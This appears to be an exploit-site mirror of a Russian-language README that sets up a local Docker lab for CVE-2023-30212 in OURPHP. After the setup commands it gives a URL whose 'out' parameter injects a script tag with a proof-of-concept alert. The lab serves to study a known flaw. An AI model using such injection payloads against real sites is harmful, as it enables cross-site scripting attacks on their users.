Sploitus

Exploit for CVE-2023-30212

kitploit · 2026-09-05

Exploit Code

MARKDOWN42 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-AASH035-CVE-2023-30212
# НАСТРОЙКА ЛАБОРАТОРИИ CVE-2023-30212

**Предварительные требования**  
Загрузить docker.io   
`sudo apt install -y docker.io`

  
ШАГИ

  1. Загрузите все файлы из моего репозитория с помощью приведенной ниже команды.  
`git clone https://github.com/AAsh035/CVE-2023-30212.git`  


  2. Теперь для создания образа docker выполните следующую команду:  
`sudo docker build -t vuln .`  


  3. Далее преобразуйте образ docker в контейнер. Контейнер должен работать на порту 80. Команда:  
`sudo docker run -d -p 80:80 vuln`

  4. Чтобы проверить, запущен ли контейнер, используйте команду:  
`sudo docker ps`

  5. Введите 127.0.0.1 в браузере, и загрузится страница OURPHP.

  6. Необходимо настроить ourphp, указав следующее:  
Имя пользователя : root  
Пароль : root  
Имя базы данных: vuln

  7. Теперь необходимо настроить имя пользователя и пароль для администратора. Укажите следующее:  
Имя пользователя: root  
Пароль: root

  8. Скопируйте приведенную ниже ссылку и вставьте ее в браузер:  
`http://localhost/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert("bug")</script>`




https://github.com/AAsh035/CVE-2023-30212/assets/136836668/218c8eca-f02b-41b2-931b-ba112da6c7e0